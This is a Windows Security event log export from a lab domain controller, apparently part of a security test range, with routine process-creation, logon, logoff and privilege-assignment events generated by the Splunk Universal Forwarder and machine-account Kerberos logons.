New Process ID: 0x9b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264790
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1518
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264792
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264791
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1624
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264795
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x86DDD8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:36:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264794
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x86DDD8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53695
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:36:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264793
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x86DDD8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:37:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264796
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1098
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264798
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1758
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264797
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264799
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x570
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264800
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264802
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264801
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1328
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264808
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x870E2B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264807
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x870E2B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53705
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264806
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x870E2B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264805
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x870DBF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264804
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x870DBF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53704
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264803
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x870DBF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:37:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264811
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x871AB3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:37:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264810
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x871AB3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53713
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:37:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264809
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x871AB3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:38:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264812
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264814
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
